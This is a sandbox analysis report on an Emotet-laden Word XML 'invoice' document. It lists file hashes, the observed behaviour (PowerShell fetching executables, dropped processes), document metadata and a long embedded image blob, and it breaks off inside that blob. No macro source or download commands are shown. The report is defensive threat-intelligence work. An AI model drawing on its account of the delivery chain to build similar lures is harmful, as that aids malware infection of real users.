analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Factura-2019-090005-01-02-2019.doc

Full analysis: https://app.any.run/tasks/d6886e6e-0ded-46a1-8750-185a13379300
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 18, 2019, 13:23:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

4FB302748C12C77CE2EACF26DCE55A42

SHA1:

CDA17A140E0E98047FE34D822238C56D46D1DC67

SHA256:

D53F9FD700393C6FEB2C80B82A057B139BDCB99DE6C4BCDDCC718AF502D53701

SSDEEP:

3072:ru2/0IzRJCT8P7Zm4codz/u5iW8EM/FWt:y2/3JdPtiJQ/Fa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 211.exe (PID: 3720)
      • 211.exe (PID: 2604)
      • wabmetagen.exe (PID: 3508)
      • wabmetagen.exe (PID: 2752)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3364)
    • Downloads executable files from IP

      • powershell.exe (PID: 3364)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3508)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3364)
      • 211.exe (PID: 2604)
    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3492)
    • Creates files in the user directory

      • powershell.exe (PID: 3364)
    • Application launched itself

      • 211.exe (PID: 3720)
    • Starts itself from another location

      • 211.exe (PID: 2604)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3172)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:02:15 12:35:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:02:15 12:35:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 2
WordDocumentDocumentPropertiesCharacters: 12
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 13
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 003B0670
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: l52___32
WordDocumentDocSuppDataBinData: (Binary data 101228 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsColormruExt: edit
WordDocumentShapeDefaultsShapedefaultsColormruColors: #00aeea
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentBgPictBackgroundBgcolor: #00AEEA
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDisplayBackgroundShape: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00005EB7
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00B62094
WordDocumentBodySectPRRsidRPr: 00743F44
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://h0_627_.S2097_20.Z695_953
WordDocumentBodySectPRPictBinData: /9j/4AAQSkZJRgABAQEAYABgAAD/4QA6RXhpZgAATU0AKgAAAAgAA1EQAAEAAAABAQAAAFERAAQA AAABAAAAAFESAAQAAAABAAAAAAAAAAD/2wBDAAcFBQYFBAcGBQYIBwcIChELCgkJChUPEAwRGBUa GRgVGBcbHichGx0lHRcYIi4iJSgpKywrGiAvMy8qMicqKyr/2wBDAQcICAoJChQLCxQqHBgcKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKir/wAARCAD0AsMD ASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUF BAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0 NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKj pKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QA HwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEE BSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZH SElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0 tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwBa KKK/Qz8WCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii gAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA CiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK KKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAoo ooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii gAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA CiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK KKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKM8YooAKKKKACiiigAooooAKKKKA CiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK KKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiijPGKA CiiigAooooAKKKXtnP4UAJRRRQAUUUUAFFFFABRRRQAUUUUAFA68iiigAoo7e9FABRRRQAUUUUAF FFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUU UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRR QAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRR9elFABRRRQAUUUUAFFFFAC1f0zQ9S 1iQLp1nJMM4L4wo/4EeK6D4c6XZanrNwNQt0nEUQZFcZAOfToa6jxn4suvDNxb2WmW0ADxbtzA/L zjAAxXmV8ZNVvYUo3l5nvYXLKTw31vETtDy3MzSPhaTtk1q8x/0xg/qx/wAPxq5qnwuspgX0q5kt n7JJ86n+o/WuIv8Axhr2oAifUZUU/wAMPyD9MV7LoTFtAsCxLE26ZJOc/KK8zFzxmHanOer7bHuZ dSy3GqVKnS0XV7ni+u+GdR8Oun9oInlyEhJI2yGP8/0rIr034sf8eWm/9dW/lXmfXgc17OCryr0F Oe58zmmFhhcVKlT20CkrsTpGjeF7GCXxFE99qE671s0fasY9/wDPXtxmmQaj4U1eQWl5ox0syHal zDLkKT0zwP5Gj63dc0YtruH9n2tGc0pPo7/j0ORoJx3rS13RZ9C1Z7Gc7+jRuBgOp6H/AD3FdJq9 7beDWt9KsdOtLi4EIe5nuU3FmPYenT+VXPEr3fZrmcjOngpXn7V8qjv6nE9qXsK7SO9Hh3wdaapY W9v9t1Kdy0jpuEagn5VHbp/OsGPWrc6XqMFzp0Mt1eSeYtx08rPoPzxz3pQxE53cY6Xtv946uEhS spT1avt5XRkUUUdODwa6zz7MKKKKAsxeO3SitHR7rTLNppdUsWvmwBDFv2rnnJY/lXRWEGi+LLa7 tbbTF0y/hiMsTxOSrgdj+lc1XEeyesXbud1DCKuvdmuZ9Nf+GOMpK1PD2itrmpeS0ghgjQyTzHoi Dr+Nasmt+GreTyLXw6txbrx58sxEj+/t/npTnXtLkim35E08LzQ9pUkorpfr9xy1FdF4QsLHUvEM y3lv5trHDJL5RYjABGOR9anOueFSpx4YYHH/AD8tUyxDU3CMW7en+ZcMGpU1UlNRTva9+nojlqKU 4ycDjNJXUeeFFFFABRRRQAUUUUAGelFFFABRQPpmigAooooAKKKKACiiigAooooAKKKKACiiigAo oooAKKKKACiijjj1oAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiig AooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAO6+Ff/Icvf+uA/wDQqPip/wAh2z/69z/6 FSfCwga7eZ4/0cf+hVB8Sr+1vdetxaTpN5URV9hztOema8NJvM7rt+h9Y5RWRpX1v+pxp6V7/oH/ ACL1h/17R/8AoIrwA9K9/wBA/wCResP+vaP/ANBFRnXww+Zpwv8AxKnojjfix/x5ab/11b+VcJ4d iWfxNp0cnKtcJn35zXd/Fj/jy03/AK6t/KvOLS5ks7yG6i+/C6yLn1BzXTl8XLBcq3dziziUYZpz S2Vv0NfxpM8/jC/Mp+44RR6AKKwq7fxHoreJgniDw8BcCZQLi3UjejAY6fT/AB5zWPpng3V7+5VZ 7V7OAHMs042hF7nnqa2oYilGglJ2srWOTFYOvUxTcE2pO6fkzodY1Waw0/w1qEccMlxNa+U/nJuB HyHP1qTxn4pvNL8SPbW9vZyIIkbMsO5uR65rn/FWrW+o61a22nHdZWKrDE3ZuRkj24A/CpfiL/yN 8n/XCP8AlXJRw8XOCmt03+KPRxGLnGlVdOWzivwaZu6p4ovLfwXo98lvZmS5Zw6tDlRgnoM8dKw9 KRJPh7r0zopkE0ZDbemWXpTtb/5Jz4f/AN+T+Zo0f/km2v8A/XWP+a04wjCjeP8AN/7cKpVlUxFp u69n/wC2kyNb+EPDlldpbRXGq6gvmK8y7hCnHQfiP19KoPrOoeLLi00u9WAvJOu2ZItrKOh+oxz+ FaWq2UvibwrpV9pKmeWyi8i5gTl1xjkDv0z9CKx9KtL3QtUstV1Czmt7aO4VWaVdp5zng8njJq6f I4SnL+Jr636GNb2kakacf4VlttbS7Z0WpX2qaJeHTvDOiulpb/KZTaFzOe5J7iszxjp8f2HTdYSz +wy3ilbi32FQrjvg9M8/pWj4lPiq31iWXTbi8uLGc+ZA1uN6hTzjjp/hXN66+uiO3TXpZjvBkjjl YZHbJHaowsW5QkmvPXV+prjppQqQcW100Vlr0KOmW9pdX6RahefYoCDum2bsY7YrsrPT7bTdHvZv CdymrXskRSV921oY+5WPqT/h+FcjZ6LqOoWcl1Y2r3Ecb7HEfLA4z06/lXSeC9JvtM1c6vqUT2Nl bRP5jzjZuyMAAHnrz+FdGMlFpvn2+z3/AFOTLoyUlF09/ta6Lv2JPBtlHP4Q1xpLhbZZCsckxGdk YGW/Qmq1hp/hPWLoadaSX1tcvxDPNgq7fT/9VO8M3CarZ67o0ZEUmoAy2wY4BIJO3+X4Zqr4e8Na qPEVs91Zy2sNrKJZZZV2qApz179O1c8vdlUlKXK91934nXH3oUYQgpLVN/N/d3DQbm38M67qEGs+ YD5L258pcnJI5H4DIqxbeHNB11Hi8P6jcJeqpZYLtR+8A9wP8fpVDVoLnxL4g1O90i3a5iSQE+WM kr90EDqc7c8VoeENCvrXXI9Tv4ZLKzswzySzrsz8pGADz3rSo1GLqqdp2Wnn6GNFOVRYd0+and2e u3e5yUkbRStHIpV0JVlPYjgim1a1O5W91a7uoxhJpnkUH0JOKq16kG3FN7ng1EozajsFFFFUQFFF FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFHHeiigAooooAKK KKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo oAKKKPp0oAKKKKACiiigCWG5mtw4hkZBIMOoJAcehx1Fadld6G4Canp00R7zWkx/9BbI/I1kUlZz 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 